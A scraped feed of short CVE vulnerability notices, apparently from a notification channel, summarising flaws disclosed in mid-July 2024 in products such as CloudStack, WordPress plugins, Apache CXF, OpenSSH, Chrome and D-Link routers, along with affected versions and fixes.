🚨 CVE-2024-41107The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account. In such environments, this can result in a complete compromise of the resources owned and/or accessible by a SAML enabled user-account.Affected users are recommended to disable the SAML authentication plugin by setting the "saml2.enabled" global setting to "false", or upgrade to version 4.18.2.2, 4.19.1.0 or later, which addresses this issue.🎖@cveNotify |
|
| 2024-07-19 11:37:24 |
🚨 CVE-2024-37547Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Livemesh Livemesh Addons for Elementor.This issue affects Livemesh Addons for Elementor: from n/a through 8.4.0.🎖@cveNotify |
|
| 2024-07-19 10:37:25 |
🚨 CVE-2024-6907A vulnerability was found in SourceCodester Record Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file sort.php. The manipulation of the argument sort leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271932.🎖@cveNotify |
|
| 2024-07-19 10:37:24 |
🚨 CVE-2024-6906A vulnerability was found in SourceCodester Record Management System 1.0 and classified as critical. This issue affects some unknown processing of the file add_leave_non_user.php. The manipulation of the argument LSS leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271931.🎖@cveNotify |
|
| 2024-07-19 09:37:29 |
🚨 CVE-2024-6905A vulnerability has been found in SourceCodester Record Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file view_info_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-271930 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-19 09:37:26 |
🚨 CVE-2024-6904A vulnerability, which was classified as critical, was found in SourceCodester Record Management System 1.0. This affects an unknown part of the file sort2_user.php. The manipulation of the argument qualification leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271929 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-19 09:37:25 |
🚨 CVE-2024-32007An improper input validation of the p2c parameter in the Apache CXF JOSE code before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform a denial of service attack by specifying a large value for this parameter in a token.🎖@cveNotify |
|
| 2024-07-19 09:37:24 |
🚨 CVE-2024-29736A SSRF vulnerability in WADL service description in versions of Apache CXF before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform SSRF style attacks on REST webservices. The attack only applies if a custom stylesheet parameter is configured.🎖@cveNotify |
|
| 2024-07-19 08:37:26 |
🚨 CVE-2024-6903A vulnerability, which was classified as critical, has been found in SourceCodester Record Management System 1.0. Affected by this issue is some unknown functionality of the file sort1_user.php. The manipulation of the argument position leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-271928.🎖@cveNotify |
|
| 2024-07-19 08:37:25 |
🚨 CVE-2024-6338The FV Flowplayer Video Player plugin for WordPress is vulnerable to time-based SQL Injection via the ‘exclude’ parameter in all versions up to, and including, 7.5.46.7212 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-07-19 08:37:24 |
🚨 CVE-2024-40724Heap-based buffer overflow vulnerability in Assimp versions prior to 5.4.2 allows a local attacker to execute arbitrary code by inputting a specially crafted file into the product.🎖@cveNotify |
|
| 2024-07-19 07:37:25 |
🚨 CVE-2024-6901A vulnerability classified as critical has been found in SourceCodester Record Management System 1.0. Affected is an unknown function of the file entry.php. The manipulation of the argument school leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-271926 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-19 07:37:24 |
🚨 CVE-2024-6900A vulnerability was found in SourceCodester Record Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file edit_emp.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-271925 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-19 06:37:25 |
🚨 CVE-2023-7269The ArtPlacer Widget WordPress plugin before 2.21.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2024-07-19 06:37:24 |
🚨 CVE-2023-7268The ArtPlacer Widget WordPress plugin before 2.21.2 does not have authorisation check in place when deleting widgets, allowing ay authenticated users, such as subscriber, to delete arbitrary widgets🎖@cveNotify |
|
| 2024-07-19 04:37:26 |
🚨 CVE-2024-6898A vulnerability was found in SourceCodester Record Management System 1.0. It has been classified as critical. This affects an unknown part of the file index.php. The manipulation of the argument UserName leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-271923.🎖@cveNotify |
|
| 2024-07-19 04:37:25 |
🚨 CVE-2022-45378In the default configuration of Apache SOAP, an RPCRouterServlet is available without authentication. This gives an attacker the possibility to invoke methods on the classpath that meet certain criteria. Depending on what classes are available on the classpath this might even lead to arbitrary remote code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-19 02:37:25 |
🚨 CVE-2024-35199TorchServe is a flexible and easy-to-use tool for serving and scaling PyTorch models in production. In affected versions the two gRPC ports 7070 and 7071, are not bound to [localhost](http://localhost/) by default, so when TorchServe is launched, these two interfaces are bound to all interfaces. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and EKS are not affected. This issue in TorchServe has been fixed in PR #3083. TorchServe release 0.11.0 includes the fix to address this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-19 02:37:24 |
🚨 CVE-2024-30130HCL Nomad server on Domino is vulnerable to the cache containing sensitive information which could potentially give an attacker the ability to acquire the sensitive information.🎖@cveNotify |
|
| 2024-07-18 23:37:24 |
🚨 CVE-2024-40642The netty incubator codec.bhttp is a java language binary http parser. In affected versions the `BinaryHttpParser` class does not properly validate input values thus giving attackers almost complete control over the HTTP requests constructed from the parsed output. Attackers can abuse several issues individually to perform various injection attacks including HTTP request smuggling, desync attacks, HTTP header injections, request queue poisoning, caching attacks and Server Side Request Forgery (SSRF). Attacker could also combine several issues to create well-formed messages for other text-based protocols which may result in attacks beyond the HTTP protocol. The BinaryHttpParser class implements the readRequestHead method which performs most of the relevant parsing of the received request. The data structure prefixes values with a variable length integer value. The parsing code below first gets the lengths of the values from the prefixed variable length integer. After it has all of the lengths and calculates all of the indices, the parser casts the applicable slices of the ByteBuf to String. Finally, it passes these values into a new `DefaultBinaryHttpRequest` object where no further parsing or validation occurs. Method is partially validated while other values are not validated at all. Software that relies on netty to apply input validation for binary HTTP data may be vulnerable to various injection and protocol based attacks. This issue has been addressed in version 0.0.13.Final. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-18 22:37:25 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-18 22:37:24 |
🚨 CVE-2024-5564A vulnerability was found in libndp. This flaw allows a local malicious user to cause a buffer overflow in NetworkManager, triggered by sending a malformed IPv6 router advertisement packet. This issue occurred as libndp was not correctly validating the route length information.🎖@cveNotify |
|
| 2024-07-18 21:37:25 |
🚨 CVE-2023-31045A stored Cross-site scripting (XSS) issue in Text Editors and Formats in Backdrop CMS before 1.24.2 allows remote attackers to inject arbitrary web script or HTML via the name parameter. When a user is editing any content type (e.g., page, post, or card) as an admin, the stored XSS payload is executed upon selecting a malicious text formatting option. NOTE: the vendor disputes the security relevance of this finding because "any administrator that can configure a text format could easily allow Full HTML anywhere."🎖@cveNotify |
|
| 2024-07-18 21:37:24 |
🚨 CVE-2021-37377Cross Site Scripting (XSS) vulnerability in Teradek Brik firmware version 7.2.x and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.🎖@cveNotify |
|
| 2024-07-18 21:07:26 |
🚨 CVE-2024-37624Xinhu RockOA v2.6.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the /chajian/inputChajian.php. component.🎖@cveNotify |
|
| 2024-07-18 21:07:25 |
🚨 CVE-2024-37619StrongShop v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the spec_group_id parameter at /spec/index.blade.php.🎖@cveNotify |
|
| 2024-07-18 21:07:24 |
🚨 CVE-2023-51680Missing Authorization vulnerability in TechnoVama Quotes for WooCommerce.This issue affects Quotes for WooCommerce: from n/a through 2.0.1.🎖@cveNotify |
|
| 2024-07-18 20:37:25 |
🚨 CVE-2020-11877airhost.exe in Zoom Client for Meetings 4.6.11 uses 3423423432325249 as the Initialization Vector (IV) for AES-256 CBC encryption. NOTE: the vendor states that this IV is used only within unreachable code🎖@cveNotify |
|
| 2024-07-18 20:37:24 |
🚨 CVE-2018-16254There is an XSS vulnerability in WP All Import plugin 3.4.9 for WordPress via action=options. NOTE: The vendor states that this is not a vulnerability. WP All Import is only able to be used by a logged in administrator, and the action described can only be taken advantage of by a logged in administrator🎖@cveNotify |
|
| 2024-07-18 20:07:30 |
🚨 CVE-2024-4201A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 before 16.10.7, all versions starting from 16.11 before 16.111.4, all versions starting from 17.0 before 17.0.2. When viewing an XML file in a repository in raw mode, it can be made to render as HTML if viewed under specific circumstances.🎖@cveNotify |
|
| 2024-07-18 20:07:26 |
🚨 CVE-2024-1736An issue has been discovered in GitLab CE/EE affecting all versions prior to 16.10.7, starting from 16.11 prior to 16.11.4, and starting from 17.0 prior to 17.0.2. A vulnerability in GitLab's CI/CD pipeline editor could allow for denial of service attacks through maliciously crafted configuration files.🎖@cveNotify |
|
| 2024-07-18 20:07:25 |
🚨 CVE-2023-52177Missing Authorization vulnerability in SoftLab Integrate Google Drive.This issue affects Integrate Google Drive: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-07-18 20:07:24 |
🚨 CVE-2023-52117Missing Authorization vulnerability in Metagauss ProfileGrid.This issue affects ProfileGrid: from n/a through 5.6.6.🎖@cveNotify |
|
| 2024-07-18 19:07:24 |
🚨 CVE-2024-0912Under certain circumstances the Microsoft® Internet Information Server (IIS) used to host the C•CURE 9000 Web Server will log Microsoft Windows credential details within logs. There is no impact to non-web service interfaces C•CURE 9000 or prior versions🎖@cveNotify |
|
| 2024-07-18 18:37:30 |
🚨 CVE-2024-5625Improper Restriction of XML External Entity Reference vulnerability in PruvaSoft Informatics Apinizer Management Console allows Data Serialization External Entities Blowup.This issue affects Apinizer Management Console: before 2024.05.1.🎖@cveNotify |
|
| 2024-07-18 18:37:26 |
🚨 CVE-2024-0857Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Universal Software Inc. FlexWater Corporate Water Management allows SQL Injection.This issue affects FlexWater Corporate Water Management: through 18072024. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-18 18:37:25 |
🚨 CVE-2023-29583yasm 1.3.0.55.g101bc was discovered to contain a stack overflow via the function parse_expr5 at /nasm/nasm-parse.c. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code.🎖@cveNotify |
|
| 2024-07-18 18:37:24 |
🚨 CVE-2021-42694An issue was discovered in the character definitions of the Unicode Specification through 14.0. The specification allows an adversary to produce source code identifiers such as function names using homoglyphs that render visually identical to a target identifier. Adversaries can leverage this to inject code via adversarial identifier definitions in upstream software dependencies invoked deceptively in downstream software. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard (all versions). Unless mitigated, an adversary could produce source code identifiers using homoglyph characters that render visually identical to but are distinct from a target identifier. In this way, an adversary could inject adversarial identifier definitions in upstream software that are not detected by human reviewers and are invoked deceptively in downstream software. The Unicode Consortium has documented this class of security vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms.🎖@cveNotify |
|
| 2024-07-18 17:37:36 |
🚨 CVE-2024-40628JumpServer is an open-source Privileged Access Management (PAM) tool that provides DevOps and IT teams with on-demand and secure access to SSH, RDP, Kubernetes, Database and RemoteApp endpoints through a web browser. An attacker can exploit the ansible playbook to read arbitrary files in the celery container, leading to sensitive information disclosure. The Celery container runs as root and has database access, allowing the attacker to steal all secrets for hosts, create a new JumpServer account with admin privileges, or manipulate the database in other ways. This issue has been addressed in release versions 3.10.12 and 4.0.0. It is recommended to upgrade the safe versions. There is no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-18 17:37:35 |
🚨 CVE-2023-40539Philips Vue PACS does not require that users have strong passwords, which could make it easier for attackers to compromise user accounts.🎖@cveNotify |
|
| 2024-07-18 17:37:31 |
🚨 CVE-2023-40159A validated user not explicitly authorized to have access to certain sensitive information could access Philips Vue PACS on the same network to expose that information.🎖@cveNotify |
|
| 2024-07-18 17:37:30 |
🚨 CVE-2023-51376Missing Authorization vulnerability in Brainstorm Force ProjectHuddle Client Site.This issue affects ProjectHuddle Client Site: from n/a through 1.0.34.🎖@cveNotify |
|
| 2024-07-18 17:37:29 |
🚨 CVE-2023-35859A Reflected Cross-Site Scripting (XSS) vulnerability in the blog function of Modern Campus - Omni CMS 2023.1 allows a remote attacker to inject arbitrary scripts or HTML via multiple parameters.🎖@cveNotify |
|
| 2024-07-18 17:37:26 |
🚨 CVE-2023-51671Missing Authorization vulnerability in FunnelKit FunnelKit Checkout.This issue affects FunnelKit Checkout: from n/a through 3.10.3.🎖@cveNotify |
|
| 2024-07-18 17:37:25 |
🚨 CVE-2024-23085Apfloat v1.10.1 was discovered to contain a NullPointerException via the component org.apfloat.internal.DoubleScramble::scramble(double[], int, int[]). NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-07-18 17:37:24 |
🚨 CVE-2023-34941A stored cross-site scripting (XSS) vulnerability in the urlFilterList function of Asus RT-N10LX Router v2.0.0.39 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL Keyword List text field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-18 17:07:29 |
🚨 CVE-2024-34008Actions in the admin management of analytics models did not include the necessary token to prevent a CSRF risk.🎖@cveNotify |
|
| 2024-07-18 17:07:26 |
🚨 CVE-2024-35429ZKTeco ZKBio CVSecurity 6.1.1 is vulnerable to Directory Traversal via eventRecord.🎖@cveNotify |
|
| 2024-07-18 17:07:25 |
🚨 CVE-2024-35349A vulnerability has been discovered in Diño Physics School Assistant version 2.3. The vulnerability impacts an unidentified code within the file /admin/category/view_category.php. Manipulating the argument id can result in SQL injection.🎖@cveNotify |
|
| 2024-07-18 17:07:24 |
🚨 CVE-2024-24885Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lê V?n To?n Woocommerce Vietnam Checkout allows Stored XSS.This issue affects Woocommerce Vietnam Checkout: from n/a through 2.0.7.🎖@cveNotify |
|
| 2024-07-18 16:37:42 |
🚨 CVE-2022-48837In the Linux kernel, the following vulnerability has been resolved:usb: gadget: rndis: prevent integer overflow in rndis_set_response()If "BufOffset" is very large the "BufOffset + 8" operation can have aninteger overflow.🎖@cveNotify |
|
| 2024-07-18 16:37:41 |
🚨 CVE-2024-35736Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themeisle Visualizer.This issue affects Visualizer: from n/a through 3.11.1.🎖@cveNotify |
|
| 2024-07-18 16:37:40 |
🚨 CVE-2024-35734Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in CodePeople WP Time Slots Booking Form allows Stored XSS.This issue affects WP Time Slots Booking Form: from n/a through 1.2.10.🎖@cveNotify |
|
| 2024-07-18 16:37:37 |
🚨 CVE-2024-35733Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in RLDD Auto Coupons for WooCommerce allows Reflected XSS.This issue affects Auto Coupons for WooCommerce: from n/a through 3.0.14.🎖@cveNotify |
|
| 2024-07-18 16:37:36 |
🚨 CVE-2024-5003The WP Stacker WordPress plugin through 1.8.5 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2024-07-18 16:37:35 |
🚨 CVE-2024-4042The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel – Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' attribute of the menu-wrap-item block in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-18 16:37:31 |
🚨 CVE-2024-3657A flaw was found in 389-ds-base. A specially-crafted LDAP query can potentially cause a failure on the directory server, leading to a denial of service🎖@cveNotify |
|
| 2024-07-18 16:37:30 |
🚨 CVE-2024-2199A denial of service vulnerability was found in 389-ds-base ldap server. This issue may allow an authenticated user to cause a server crash while modifying `userPassword` using malformed input.🎖@cveNotify |
|
| 2024-07-18 16:07:24 |
🚨 CVE-2023-6956The EasyAzon – Amazon Associates Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘easyazon-cloaking-locale’ parameter in all versions up to, and including, 5.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-18 15:37:25 |
🚨 CVE-2024-39901OpenSearch Observability is collection of plugins and applications that visualize data-driven events. An issue in the OpenSearch observability plugins allows unintended access to private tenant resources like notebooks. The system did not properly check if the user was the resource author when accessing resources in a private tenant, leading to potential data being revealed. The patches are included in OpenSearch 2.14.🎖@cveNotify |
|
| 2024-07-18 15:37:24 |
🚨 CVE-2023-38255A potential attacker with or without (cookie theft) access to the device would be able to include malicious code (XSS) when uploading new device configuration that could affect the intended function of the device.🎖@cveNotify |
|
| 2024-07-18 15:07:30 |
🚨 CVE-2024-3176Out of bounds write in SwiftShader in Google Chrome prior to 117.0.5938.62 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-07-18 15:07:29 |
🚨 CVE-2024-3175Insufficient data validation in Extensions in Google Chrome prior to 120.0.6099.62 allowed a remote attacker to perform privilege escalation via a crafted Chrome Extension. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-07-18 15:07:26 |
🚨 CVE-2024-3174Inappropriate implementation in V8 in Google Chrome prior to 119.0.6045.105 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-07-18 15:07:25 |
🚨 CVE-2024-3171Use after free in Accessibility in Google Chrome prior to 122.0.6261.57 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via specific UI gestures. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-07-18 15:07:24 |
🚨 CVE-2024-3170Use after free in WebRTC in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-07-18 14:37:30 |
🚨 CVE-2024-34013Local privilege escalation due to OS command injection vulnerability. The following products are affected: Acronis True Image (macOS) before build 41396.🎖@cveNotify |
|
| 2024-07-18 14:37:26 |
🚨 CVE-2024-31143An optional feature of PCI MSI called "Multiple Message" allows adevice to use multiple consecutive interrupt vectors. Unlike for MSI-X,the setting up of these consecutive vectors needs to happen all in onego. In this handling an error path could be taken in differentsituations, with or without a particular lock held. This error pathwrongly releases the lock even when it is not currently held.🎖@cveNotify |
|
| 2024-07-18 14:37:25 |
🚨 CVE-2024-5471Zohocorp ManageEngine DDI Central versions 4001 and prior were vulnerable to agent takeover vulnerability due to the hard-coded sensitive keys.🎖@cveNotify |
|
| 2024-07-18 14:37:24 |
🚨 CVE-2024-27311Zohocorp ManageEngine DDI Central versions 4001 and prior were vulnerable to directory traversal vulnerability which allows the user to upload new files to the server folder.🎖@cveNotify |
|
| 2024-07-18 13:37:24 |
🚨 CVE-2017-12238A vulnerability in the Virtual Private LAN Service (VPLS) code of Cisco IOS 15.0 through 15.4 for Cisco Catalyst 6800 Series Switches could allow an unauthenticated, adjacent attacker to cause a C6800-16P10G or C6800-16P10G-XL type line card to crash, resulting in a denial of service (DoS) condition. The vulnerability is due to a memory management issue in the affected software. An attacker could exploit this vulnerability by creating a large number of VPLS-generated MAC entries in the MAC address table of an affected device. A successful exploit could allow the attacker to cause a C6800-16P10G or C6800-16P10G-XL type line card to crash, resulting in a DoS condition. This vulnerability affects Cisco Catalyst 6800 Series Switches that are running a vulnerable release of Cisco IOS Software and have a Cisco C6800-16P10G or C6800-16P10G-XL line card in use with Supervisor Engine 6T. To be vulnerable, the device must also be configured with VPLS and the C6800-16P10G or C6800-16P10G-XL line card needs to be the core-facing MPLS interfaces. Cisco Bug IDs: CSCva61927.🎖@cveNotify |
|
| 2024-07-18 10:37:25 |
🚨 CVE-2024-40898SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context, allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests.Users are recommended to upgrade to version 2.4.62 which fixes this issue.🎖@cveNotify |
|
| 2024-07-18 10:37:24 |
🚨 CVE-2024-40725A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.Users are recommended to upgrade to version 2.4.62, which fixes this issue.🎖@cveNotify |
|
| 2024-07-18 09:37:25 |
🚨 CVE-2024-5554The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘onclick_event’ parameter in all versions up to, and including, 5.6.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-18 09:37:24 |
🚨 CVE-2024-3242The Brizy – Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file extension validation in the validateImageContent function called via storeImages in all versions up to, and including, 2.4.43. This makes it possible for authenticated attackers, with contributor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. Version 2.4.44 prevents the upload of files ending in .sh and .php. Version 2.4.45 fully patches the issue.🎖@cveNotify |
|
| 2024-07-18 08:37:25 |
🚨 CVE-2024-40764Heap-based buffer overflow vulnerability in the SonicOS IPSec VPN allows an unauthenticated remote attacker to cause Denial of Service (DoS).🎖@cveNotify |
|
| 2024-07-18 08:37:24 |
🚨 CVE-2024-29014Vulnerability in SonicWall NetExtender Windows (32 and 64-bit) client 10.2.339 and earlier versions allows an attacker to arbitrary code execution when processing an EPC Client update.🎖@cveNotify |
|
| 2024-07-18 07:37:24 |
🚨 CVE-2024-41011In the Linux kernel, the following vulnerability has been resolved:drm/amdkfd: don't allow mapping the MMIO HDP page with large pagesWe don't get the right offset in that case. The GPU hasan unused 4K area of the register BAR space into which you canremap registers. We remap the HDP flush registers into thisspace to allow userspace (CPU or GPU) to flush the HDP when itupdates VRAM. However, on systems with >4K pages, we end upexposing PAGE_SIZE of MMIO space.🎖@cveNotify |
|
| 2024-07-18 06:37:24 |
🚨 CVE-2024-6164The Filter & Grids WordPress plugin before 2.8.33 is vulnerable to Local File Inclusion via the post_layout parameter. This makes it possible for an unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.🎖@cveNotify |
|
| 2024-07-18 03:37:24 |
🚨 CVE-2023-6708The SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG upload feature in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping, even when the 'Sanitize SVG while uploading' feature is enabled. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that successful exploitation of this vulnerability requires the administrator to allow author-level users to upload SVG files.🎖@cveNotify |
|
| 2024-07-18 02:37:25 |
🚨 CVE-2024-5964The Zenon Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter within the theme's Button shortcode in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-18 02:37:24 |
🚨 CVE-2024-5726The Timeline Event History plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1 via deserialization of untrusted input 'timelines-data' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-07-18 01:37:32 |
🚨 CVE-2024-39682Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to HTML Injection in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary HTML in pages that will be shown whenever a user accesses a compromised page. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-18 01:37:26 |
🚨 CVE-2024-39681Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-18 01:37:25 |
🚨 CVE-2024-39678Cooked is a recipe plugin for WordPress. The Cooked plugin is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 1.7.15.4 due to missing or incorrect nonce validation on the AJAX action handler. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication. This issue has been addressed in release version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-18 01:37:24 |
🚨 CVE-2024-24806libuv is a multi-platform support library with a focus on asynchronous I/O. The `uv_getaddrinfo` function in `src/unix/getaddrinfo.c` (and its windows counterpart `src/win/getaddrinfo.c`), truncates hostnames to 256 characters before calling `getaddrinfo`. This behavior can be exploited to create addresses like `0x00007f000001`, which are considered valid by `getaddrinfo` and could allow an attacker to craft payloads that resolve to unintended IP addresses, bypassing developer checks. The vulnerability arises due to how the `hostname_ascii` variable (with a length of 256 bytes) is handled in `uv_getaddrinfo` and subsequently in `uv__idna_toascii`. When the hostname exceeds 256 characters, it gets truncated without a terminating null byte. As a result attackers may be able to access internal APIs or for websites (similar to MySpace) that allows users to have `username.example.com` pages. Internal services that crawl or cache these user pages can be exposed to SSRF attacks if a malicious user chooses a long vulnerable username. This issue has been addressed in release version 1.48.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-07-18 01:07:25 |
🚨 CVE-2024-28995SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.🎖@cveNotify |
|
| 2024-07-18 01:07:24 |
🚨 CVE-2022-22948The vCenter Server contains an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.🎖@cveNotify |
|
| 2024-07-17 22:37:32 |
🚨 CVE-2024-40492Cross Site Scripting vulnerability in Heartbeat Chat v.15.2.1 allows a remote attacker to execute arbitrary code via the setname function.🎖@cveNotify |
|
| 2024-07-17 22:37:25 |
🚨 CVE-2021-3407A flaw was found in mupdf 1.18.0. Double free of object during linearization may lead to memory corruption and other potential consequences.🎖@cveNotify |
|
| 2024-07-17 22:37:24 |
🚨 CVE-2019-7321Usage of an uninitialized variable in the function fz_load_jpeg in Artifex MuPDF 1.14 can result in a heap overflow vulnerability that allows an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-07-17 21:37:25 |
🚨 CVE-2023-36092Authentication Bypass vulnerability in D-Link DIR-859 FW105b03 allows remote attackers to gain escalated privileges via via phpcgi_main. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-07-17 21:37:24 |
🚨 CVE-2022-29778D-Link DIR-890L 1.20b01 allows attackers to execute arbitrary code due to the hardcoded option Wake-On-Lan for the parameter 'descriptor' at SetVirtualServerSettings.php🎖@cveNotify |
|
| 2024-07-17 21:07:24 |
